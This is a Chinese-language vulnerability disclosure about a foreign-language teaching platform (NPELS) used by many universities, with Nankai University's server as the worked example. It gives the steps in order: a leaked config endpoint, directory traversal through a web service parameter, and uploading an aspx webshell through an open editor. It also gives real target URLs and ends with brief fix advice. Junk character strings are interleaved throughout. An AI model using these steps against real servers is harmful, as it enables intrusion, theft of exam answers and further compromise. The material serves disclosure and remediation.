好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
7 w# _2 S" I4 I
% U7 n) n4 I! s+ Z详细说明:
L5 h' r7 c$ k; B0 I: ~) S
2 q' y2 a% G8 | o' h以南开大学的为例: : C, L& x# U' Q' `- A% M
http://222.30.60.3/NPELS1 [: j# M3 h' r' G% U" T2 }
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
8 `: P* l5 c' b/ Z% ^ |6 A<setting name="Update_CommonSvr_CommonService" serializeAs="String">
5 g- p, L3 \, R<value>http://222.30.60.3/NPELS/CommonService.asmx</value>3 v7 V. @0 h' B: N# W+ V' B2 r7 x% S
</setting>8 ?8 g5 _( }( a" n3 W6 r
及版本号 w' |5 Q5 x, `/ X- z/ f2 c
<add key="TVersion" value="1, 0, 0, 2187"># B4 O3 J# L9 {) h$ l; i4 | ?1 S: X
</add>
7 S+ {" _* r! E2 J" t直接访问
% R9 {7 c6 ^: rhttp://222.30.60.3/NPELS/CommonService.asmx) Z( ?: q5 o( ~1 {8 k
使用GetTestClientFileList操作,直接 HTTP GET 列目录:5 [5 x+ h3 F9 G# q4 X
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21870 J( ^, ~$ p2 C; z
进一步列目录(返回的网页很大,可以直接 wget 下来)! p& r+ W5 k- F7 [, H6 M5 T+ \/ s6 L3 s6 Q
http://222.30.60.3/NPELS/CommonS ... List?version=../../
8 g9 `) B/ Y: h' e 6 p, d. Q! E/ ?# ?
发现
0 n" [; r0 `9 o: khttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
8 {8 v- N# i' {- {3 \# {! C) a, P$ k可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头2 y ?2 B% Z8 ~' i! Q6 ^
上传后继续列目录找到木马地址直接访问即可
: B$ v9 ?' T" C& u0 M7 s7 \- t/ ]
& J9 m1 ^* r& D# }OOXX
- b, T9 a* v8 _2 j; ~: I ! v* C4 i( ^& z. O F3 _/ G' n
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
( A9 d* v+ @$ C) R% j漏洞证明:9 L% y6 @# q; |- l [) K, g
0 w/ [ N2 d( q8 V& x; E% h列目录:
+ r- X& {/ Y) K" Ghttp://222.30.60.3/NPELS/CommonS ... List?version=../../* r2 h+ q4 H' U. x8 a- d Z
文件上传:
+ O' z! f3 j: h8 ?- ahttp://222.30.60.3/npelsv/editor/editor.htm8 E% O: Y& I8 u5 b7 {' d8 z& Y
! K$ D! }7 M5 k: Z( B8 M" b
上传木马:
# P: i7 |2 _2 D( p M+ ~http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx( q, y( J3 V! g6 V! B
$ j7 r# C0 t2 v% o# F
修复方案:$ q q s. W4 J3 s
好像考试系统必须使用 CommonService.asmx
7 d' o% A6 `3 t最好配置文件加密或者用别的方式不让它泄露出来+ h/ S- t$ {+ m$ I0 r
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
I7 t8 L0 s* p& D |